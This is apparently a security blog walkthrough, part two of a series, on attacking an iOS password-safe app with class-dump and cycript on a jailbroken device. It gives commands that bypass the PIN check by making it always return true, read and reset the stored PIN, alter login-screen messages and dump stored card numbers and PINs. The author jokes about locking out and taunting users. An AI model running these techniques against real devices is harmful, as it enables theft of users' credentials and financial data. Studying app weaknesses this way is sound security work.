Hack Whack and Smack

IOS App Testing – Part 2

Okay so it might be a long time coming…

Part 2:

In part two we are again looking at Password Safe apps, but this time the app stores its data in an unintelligible format (it looks to be encrypted, or at least encoded, judging by the method calls used to read the file in). Either way the files are not in clear text, and from the class-dump the app loads them as an XFFile object, a format I couldn't work out how to open. Part two is going to look at how to:

1. Execute actions

2. Mess with variables

3. Bypass logins and read data from apparently secure files.

Execute actions:

We have already followed the steps from part 1 detailing how to dump the class information from an encrypted app using clutch, and can now see that each class has a number of actions. Actions, as I am referring to them, are commands such as check-password or terminate application. The demo in this case will just be to lock the app, which, if put in a loop, could be particularly funny should someone be trying to access their information:

The class dump shows the following output under AppDelegate:

–CUT–

-(void)initFileCount;

-(void)freeVersionWarning;

-(id)cloudURL;

-(void)loadData;

-(void)lock;

-(void)takePicture;

-(void)dealloc;

-(void)rateMyApp;

–CUT–

Therefore it is possible to execute the action from cycript by sending the message to the app delegate:

cy# [UIApp.delegate lock]

Some other interesting functionality can be seen, such as takePicture and freeVersionWarning. The warning is particularly annoying. It would be interesting to change the message and have it pop up…

Messing with variable or property value:

This is just a quick and dirty example to show how to change messages on the screen and set variables or booleans. The screen at the time of login shows a nice message stating that the user should enter a password. Well, I think we should be modifying that to some slanderous dig about the individual's manhood… or at least to inform them of the new-found predicament they are about to find themselves in as we move through the next section.

Anyway, on to changing the value:

Let’s start with where we are in the app on the screen and compare it to the method calls and associated variables.

cy# UIApp.keyWindow.rootViewController.visibleViewController

#"<InputView: 0x1fd67ed0>"

Reviewing the InputView class in the class-dump reveals a few interesting methods:

–CUT–

-(void)changeType:(id)type;

-(void)reloadViews;

-(id)init;

-(void)updateTittle:(id)tittle;

–CUT–

The one we are interested in is updateTittle. The command below shows how we can check the current title message by reading inputViewTitle:

cy# [UIApp.keyWindow.rootViewController.visibleViewController inputViewTitle]

Before:

(screenshot: original message)

Now we can use updateTittle to change the message given to the user at the login screen:

cy# [UIApp.keyWindow.rootViewController.visibleViewController updateTittle: "Password is wrong mwahahaha"]

After:

(screenshot: new message)

I have to rein in the insults so as not to offend all the women and children that visit the site…

That was fun and all, but what about breaking stuff? Fear not, we're getting there; the first parts are important for changing and manipulating the app and its responses.

Breaking Stuff:

The first thing I am going to demonstrate is how easy it is to bypass the PIN.

The InputView class actually has a delegate of class login. This can be found by running the following command and then reviewed in the class-dump:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate

#"<login: 0x1fdc9fc0>"

There is no need to go into great detail here; it's just the same as part one, where we change a boolean method to return true. This was a little harder as there were multiple methods called and it required a bit more digging. Don't forget there are a number of useful functions in cycript for exploring the app.

The following command replaces the inputDidTestingPassword: method with a function that always returns true, which results in the application allowing access with any PIN. This is important as it tells us that the password comparison is done in this method:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate->isa.messages['inputDidTestingPassword:'] = function() { return true }

Stealing and Resetting the PIN:

The first thing we have to look at is the class-dump, which shows the file userData being read in at the start of login, the delegate of InputView:

(screenshot: login class in the class-dump)

Therefore, if it's going to be loaded into memory I want to be able to read it, or at least that is the plan. The following commands detail how to read files; the file in this case is userData:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData

#"<XFFile: 0x1e56fc40>"

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data

@{"password":"1402","fileHidden":true}

(screenshot: reading and changing the PIN)

And there she is…..cycript is awesome!!!

Now let's consider our earlier task of changing the message…

Yep, we can update the information in memory as per the screenshot above:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data = {"password":"1234","fileHidden":true}

{password:"1234",fileHidden:true}

We can now login with the PIN 1234! HEHEHE, not to forget the message about manhood! This could be quite a shock to a user of the app who ends up locked out and abused!

And logged in:

(screenshot: logged in)

It is possible to access other files in the same way. I was able to access the data while the app was open on the relevant page, as can be seen below:

cy# UIApp.keyWindow.rootViewController.visibleViewController.file.data

@{"data":@[@{"key":"Account Number","value":"3131313131","type":6},@{"key":"PIN","value":"5555","type":4},@{"key":"Type","value":"MasterCard","type":12},@{"key":"Bank Name","value":"Happy Bank","type":7},@{"key":"Address","value":"","type":7},@{"key":"Owner","value":"","type":7},@{"key":"SWIFT Code","value":"","type":1},@{"key":"Routing Number","value":"","type":10},@{"key":"IBAN","value":"","type":10},@{"key":"Hotline","value":"","type":11},@{"key":"Notes","value":"","type":9}],"imgName":"154.png"}

The data clearly contains card details and PINs that are supposed to be secured, showing that nothing in the app is safe once your phone is rooted.

(screenshot: credit card details)

There will of course be a part three, and the idea this time is not to wait so long and then rush something through ;-P